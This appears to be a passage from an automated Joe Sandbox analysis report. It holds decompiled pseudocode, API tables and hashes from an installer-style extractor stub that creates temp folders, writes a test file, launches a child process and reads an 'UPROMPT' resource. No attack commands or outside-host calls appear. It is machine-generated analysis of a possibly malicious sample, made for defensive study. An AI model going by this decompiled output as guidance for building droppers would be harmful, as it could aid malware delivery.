                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                            					_t13 = E010D58C8(_t48); // executed
                                                                                                                                                                                                                                            					if(_t13 != 0) {
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						_t42 = _a4;
                                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							 *0x10d9124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                                            							return E010D6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t16 = E010D597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                            						if(_t16 != 0) {
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t61 =  *0x10d8a20; // 0x0
                                                                                                                                                                                                                                            						if(_t61 != 0) {
                                                                                                                                                                                                                                            							 *0x10d8a20 = 0;
                                                                                                                                                                                                                                            							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L22:
                                                                                                                                                                                                                                            						_t14 = 0;
                                                                                                                                                                                                                                            						goto L24;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                            						 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x10d8a20 = 1;
                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 =  &_v268;
                                                                                                                                                                                                                                            				_t20 = E010D53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                            				if(_t20 == 0) {
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t48 = 0x10d91e4;
                                                                                                                                                                                                                                            				E010D1781(0x10d91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                            				if(( *0x10d9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E010D658A(_t48, 0x104, 0x10d1140);
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                            				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					_push("i386");
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					E010D658A(_t48, 0x104);
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = _t26 - 1;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					_push("mips");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = _t28 - 1;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					_push("alpha");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t29 != 1) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push("ppc");
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            0x010d5472
                                                                                                                                                                                                                                            0x010d5479
                                                                                                                                                                                                                                            0x010d5481
                                                                                                                                                                                                                                            0x010d5484
                                                                                                                                                                                                                                            0x010d551c
                                                                                                                                                                                                                                            0x010d5521
                                                                                                                                                                                                                                            0x010d5528
                                                                                                                                                                                                                                            0x010d552d
                                                                                                                                                                                                                                            0x010d552f
                                                                                                                                                                                                                                            0x010d5539
                                                                                                                                                                                                                                            0x010d554d
                                                                                                                                                                                                                                            0x010d554d
                                                                                                                                                                                                                                            0x010d5552
                                                                                                                                                                                                                                            0x010d5585
                                                                                                                                                                                                                                            0x010d5585
                                                                                                                                                                                                                                            0x010d558b
                                                                                                                                                                                                                                            0x010d558d
                                                                                                                                                                                                                                            0x010d559d
                                                                                                                                                                                                                                            0x010d559d
                                                                                                                                                                                                                                            0x010d5557
                                                                                                                                                                                                                                            0x010d555e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5560
                                                                                                                                                                                                                                            0x010d5566
                                                                                                                                                                                                                                            0x010d5569
                                                                                                                                                                                                                                            0x010d556f
                                                                                                                                                                                                                                            0x010d556f
                                                                                                                                                                                                                                            0x010d5581
                                                                                                                                                                                                                                            0x010d5581
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5581
                                                                                                                                                                                                                                            0x010d5545
                                                                                                                                                                                                                                            0x010d557c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d557c
                                                                                                                                                                                                                                            0x010d5547
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5547
                                                                                                                                                                                                                                            0x010d548a
                                                                                                                                                                                                                                            0x010d5490
                                                                                                                                                                                                                                            0x010d5497
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d549d
                                                                                                                                                                                                                                            0x010d54ab
                                                                                                                                                                                                                                            0x010d54b4
                                                                                                                                                                                                                                            0x010d54c0
                                                                                                                                                                                                                                            0x010d550c
                                                                                                                                                                                                                                            0x010d5511
                                                                                                                                                                                                                                            0x010d5515
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5515
                                                                                                                                                                                                                                            0x010d54c9
                                                                                                                                                                                                                                            0x010d54d6
                                                                                                                                                                                                                                            0x010d54d8
                                                                                                                                                                                                                                            0x010d54fe
                                                                                                                                                                                                                                            0x010d5503
                                                                                                                                                                                                                                            0x010d5507
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5507
                                                                                                                                                                                                                                            0x010d54da
                                                                                                                                                                                                                                            0x010d54dd
                                                                                                                                                                                                                                            0x010d54f7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d54f7
                                                                                                                                                                                                                                            0x010d54df
                                                                                                                                                                                                                                            0x010d54e2
                                                                                                                                                                                                                                            0x010d54f0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d54f0
                                                                                                                                                                                                                                            0x010d54e7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d54e9
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,010D91E4,00000001,010D91E4,00000000), ref: 010D54C9
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(010D91E4,00000000,010D91E4,00000001,010D91E4,00000000), ref: 010D553D
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(010D91E4,00000000,010D91E4,00000001,010D91E4,00000000), ref: 010D556F
                                                                                                                                                                                                                                              • Part of subcall function 010D53A1: RemoveDirectoryA.KERNELBASE(?,?,010D91E4,?,00000001,010D91E4,00000000), ref: 010D53FB
                                                                                                                                                                                                                                              • Part of subcall function 010D53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,010D91E4,00000000), ref: 010D5402
                                                                                                                                                                                                                                              • Part of subcall function 010D53A1: GetTempFileNameA.KERNEL32(010D91E4,IXP,00000000,?,?,00000001,010D91E4,00000000), ref: 010D541F
                                                                                                                                                                                                                                              • Part of subcall function 010D53A1: DeleteFileA.KERNEL32(?,?,00000001,010D91E4,00000000), ref: 010D542B
                                                                                                                                                                                                                                              • Part of subcall function 010D53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,010D91E4,00000000), ref: 010D5434
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                            • String ID: alpha$i386$mips$ppc
                                                                                                                                                                                                                                            • API String ID: 1979080616-1048730182
                                                                                                                                                                                                                                            • Opcode ID: c4e34e9f24eea569ed9133e4d25234710232d6bfd9d3dc8ae0621cfe435231de
                                                                                                                                                                                                                                            • Instruction ID: fd819dcacf4582721589cc42e2be9cf07f8fcb7b62f7ad9da4688b69ee54edfd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4e34e9f24eea569ed9133e4d25234710232d6bfd9d3dc8ae0621cfe435231de
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49314770B013119BDB219B3D9C14ABE7BFAAF91244B84416AEDC2C318CDF76CA018795
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 614 10d3fef-10d4010 615 10d410a-10d411a call 10d6ce0 614->615 616 10d4016-10d403b CreateProcessA 614->616 617 10d40c4-10d4101 call 10d6285 GetLastError FormatMessageA call 10d44b9 616->617 618 10d4041-10d406e WaitForSingleObject GetExitCodeProcess 616->618 630 10d4106 617->630 621 10d4091 call 10d411b 618->621 622 10d4070-10d4077 618->622 629 10d4096-10d40b8 CloseHandle * 2 621->629 622->621 625 10d4079-10d407b 622->625 625->621 628 10d407d-10d4089 625->628 628->621 631 10d408b 628->631 632 10d4108 629->632 633 10d40ba-10d40c0 629->633 630->632 631->621 632->615 633->632 634 10d40c2 633->634 634->630
                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                            			E010D3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                            				long _v528;
                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                                            				_t20 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                                                                                            				_t49 = 1;
                                                                                                                                                                                                                                            				_t22 = 0;
                                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return E010D6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                                            					 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                                                            					_t45 = 0x4c4;
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					_t49 = 0;
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t22 = _t49;
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                            				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                            				_t44 = _v528;
                                                                                                                                                                                                                                            				_t53 =  *0x10d8a28; // 0x0
                                                                                                                                                                                                                                            				if(_t53 == 0) {
                                                                                                                                                                                                                                            					_t34 =  *0x10d9a2c;
                                                                                                                                                                                                                                            					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                            						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                            							 *0x10d9a2c = _t44;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E010D411B(_t34, _t44);
                                                                                                                                                                                                                                            				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                            				CloseHandle(_v544);
                                                                                                                                                                                                                                            				if(( *0x10d9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x010d3fef
                                                                                                                                                                                                                                            0x010d3ffa
                                                                                                                                                                                                                                            0x010d4001
                                                                                                                                                                                                                                            0x010d4008
                                                                                                                                                                                                                                            0x010d400a
                                                                                                                                                                                                                                            0x010d400b
                                                                                                                                                                                                                                            0x010d4010
                                                                                                                                                                                                                                            0x010d410a
                                                                                                                                                                                                                                            0x010d411a
                                                                                                                                                                                                                                            0x010d411a
                                                                                                                                                                                                                                            0x010d401c
                                                                                                                                                                                                                                            0x010d401d
                                                                                                                                                                                                                                            0x010d401e
                                                                                                                                                                                                                                            0x010d401f
                                                                                                                                                                                                                                            0x010d4033
                                                                                                                                                                                                                                            0x010d403b
                                                                                                                                                                                                                                            0x010d40ca
                                                                                                                                                                                                                                            0x010d40e9
                                                                                                                                                                                                                                            0x010d40f8
                                                                                                                                                                                                                                            0x010d4101
                                                                                                                                                                                                                                            0x010d4106
                                                                                                                                                                                                                                            0x010d4106
                                                                                                                                                                                                                                            0x010d4108
                                                                                                                                                                                                                                            0x010d4108
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4108
                                                                                                                                                                                                                                            0x010d4049
                                                                                                                                                                                                                                            0x010d405c
                                                                                                                                                                                                                                            0x010d4062
                                                                                                                                                                                                                                            0x010d4068
                                                                                                                                                                                                                                            0x010d406e
                                                                                                                                                                                                                                            0x010d4070
                                                                                                                                                                                                                                            0x010d4077
                                                                                                                                                                                                                                            0x010d407f
                                                                                                                                                                                                                                            0x010d4089
                                                                                                                                                                                                                                            0x010d408b
                                                                                                                                                                                                                                            0x010d408b
                                                                                                                                                                                                                                            0x010d4089
                                                                                                                                                                                                                                            0x010d4077
                                                                                                                                                                                                                                            0x010d4091
                                                                                                                                                                                                                                            0x010d409c
                                                                                                                                                                                                                                            0x010d40a8
                                                                                                                                                                                                                                            0x010d40b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d40c2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d40c2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 010D4033
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 010D4049
                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE ref: 010D405C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 010D409C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 010D40A8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010D40DC
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010D40E9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                            • Opcode ID: 54f134a69a6fe14670978b3cf2ce4aec2f92b61e36ee048346cf19e0cee113e0
                                                                                                                                                                                                                                            • Instruction ID: 74f910aa1002154ade6312213230306f09f494e261e2144b5384ce0c4e1cb9e5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54f134a69a6fe14670978b3cf2ce4aec2f92b61e36ee048346cf19e0cee113e0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1231B135742318ABEB709B79DC48FAB7BB8EB94700F1001A9F985D2551C6364881CF50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 659 10d58c8-10d58d5 660 10d58d8-10d58dd 659->660 660->660 661 10d58df-10d58f1 LocalAlloc 660->661 662 10d5919-10d5959 call 10d1680 call 10d658a CreateFileA LocalFree 661->662 663 10d58f3-10d5901 call 10d44b9 661->663 667 10d5906-10d5910 call 10d6285 662->667 672 10d595b-10d596c CloseHandle GetFileAttributesA 662->672 663->667 673 10d5912-10d5918 667->673 672->667 674 10d596e-10d5970 672->674 674->667 675 10d5972-10d597b 674->675 675->673
                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E010D58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				signed char _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                                                                                            				CHAR* _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t27 = __ecx;
                                                                                                                                                                                                                                            				_t1 = _t27 + 1; // 0x10d91e5
                                                                                                                                                                                                                                            				_t23 = _t1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t6 =  *_t27;
                                                                                                                                                                                                                                            					_t27 = _t27 + 1;
                                                                                                                                                                                                                                            				} while (_t6 != 0);
                                                                                                                                                                                                                                            				_t2 = _t27 - _t23 + 0x14; // 0x10d91f9
                                                                                                                                                                                                                                            				_t36 = _t2;
                                                                                                                                                                                                                                            				_t20 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                            				if(_t20 != 0) {
                                                                                                                                                                                                                                            					E010D1680(_t20, _t36, _t33);
                                                                                                                                                                                                                                            					E010D658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                            					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                            					_v8 = _t10;
                                                                                                                                                                                                                                            					LocalFree(_t20);
                                                                                                                                                                                                                                            					_t12 = _v8;
                                                                                                                                                                                                                                            					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						CloseHandle(_t12);
                                                                                                                                                                                                                                            						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                            						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0x10d9124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            					_t14 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t14;
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x010d58cd
                                                                                                                                                                                                                                            0x010d58d1
                                                                                                                                                                                                                                            0x010d58d3
                                                                                                                                                                                                                                            0x010d58d5
                                                                                                                                                                                                                                            0x010d58d5
                                                                                                                                                                                                                                            0x010d58d8
                                                                                                                                                                                                                                            0x010d58d8
                                                                                                                                                                                                                                            0x010d58da
                                                                                                                                                                                                                                            0x010d58db
                                                                                                                                                                                                                                            0x010d58e1
                                                                                                                                                                                                                                            0x010d58e1
                                                                                                                                                                                                                                            0x010d58ed
                                                                                                                                                                                                                                            0x010d58f1
                                                                                                                                                                                                                                            0x010d591e
                                                                                                                                                                                                                                            0x010d592c
                                                                                                                                                                                                                                            0x010d5943
                                                                                                                                                                                                                                            0x010d594a
                                                                                                                                                                                                                                            0x010d594d
                                                                                                                                                                                                                                            0x010d5953
                                                                                                                                                                                                                                            0x010d5959
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d595b
                                                                                                                                                                                                                                            0x010d595c
                                                                                                                                                                                                                                            0x010d5963
                                                                                                                                                                                                                                            0x010d596c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5972
                                                                                                                                                                                                                                            0x010d5974
                                                                                                                                                                                                                                            0x010d597a
                                                                                                                                                                                                                                            0x010d597a
                                                                                                                                                                                                                                            0x010d596c
                                                                                                                                                                                                                                            0x010d58f3
                                                                                                                                                                                                                                            0x010d5901
                                                                                                                                                                                                                                            0x010d5906
                                                                                                                                                                                                                                            0x010d590b
                                                                                                                                                                                                                                            0x010d5910
                                                                                                                                                                                                                                            0x010d5910
                                                                                                                                                                                                                                            0x010d5918

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,010D91F9,00000001,010D91E4,00000000,010D91E4,?,010D5534,010D91E4,00000001,010D91E4,00000000), ref: 010D58E7
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,010D91E4,?,010D5534,010D91E4,00000001,010D91E4,00000000), ref: 010D5943
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,010D5534,010D91E4,00000001,010D91E4,00000000), ref: 010D594D
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,010D5534,010D91E4,00000001,010D91E4,00000000), ref: 010D595C
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(010D91E4,?,010D5534,010D91E4,00000001,010D91E4,00000000), ref: 010D5963
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                            • String ID: TMP4351$.TMP
                                                                                                                                                                                                                                            • API String ID: 747627703-2619824408
                                                                                                                                                                                                                                            • Opcode ID: 0036fcb8c811dced1aa4640e3ac358996f8f8bbfa2e54a89d65aa8bc2f120182
                                                                                                                                                                                                                                            • Instruction ID: 2e8ec024b2f81bcc9e39ebafced0b9f4261f17996df3a835a5bbb4d3ec8278f2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0036fcb8c811dced1aa4640e3ac358996f8f8bbfa2e54a89d65aa8bc2f120182
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 561138317013216BD7301E7D9C0DA9BBFADDF46260B004659F9C5D31C4CE75980583A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 635 10d51e5-10d520b call 10d468f LocalAlloc 638 10d522d-10d523c call 10d468f 635->638 639 10d520d-10d5228 call 10d44b9 call 10d6285 635->639 644 10d523e-10d5260 call 10d44b9 LocalFree 638->644 645 10d5262-10d5270 lstrcmpA 638->645 654 10d52b0 639->654 644->654 648 10d527e-10d529c call 10d44b9 LocalFree 645->648 649 10d5272-10d5273 LocalFree 645->649 657 10d529e-10d52a4 648->657 658 10d52a6 648->658 652 10d5279-10d527c 649->652 655 10d52b2-10d52b5 652->655 654->655 657->652 658->654
                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D51E5(void* __eflags) {
                                                                                                                                                                                                                                            				int _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = E010D468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				if(_t28 != 0) {
                                                                                                                                                                                                                                            					if(E010D468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                            						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                            						if(_t5 != 0) {
                                                                                                                                                                                                                                            							_t6 = E010D44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                            							LocalFree(_t28);
                                                                                                                                                                                                                                            							if(_t6 != 6) {
                                                                                                                                                                                                                                            								 *0x10d9124 = 0x800704c7;
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *0x10d9124 = 0;
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t28);
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree(_t28);
